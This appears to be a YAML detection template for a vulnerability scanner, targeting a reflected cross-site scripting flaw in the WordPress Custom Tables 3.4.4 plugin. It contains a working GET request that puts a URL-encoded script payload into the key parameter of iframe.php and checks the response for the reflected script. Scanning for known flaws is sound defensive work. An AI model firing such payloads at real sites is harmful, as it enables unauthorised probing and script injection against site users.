product: WordPress
vName: WordPress Custom Tables - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress Custom Tables 3.4.4 plugin contains a cross-site scripting vulnerability via the key parameter.
version: 3.4.4
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
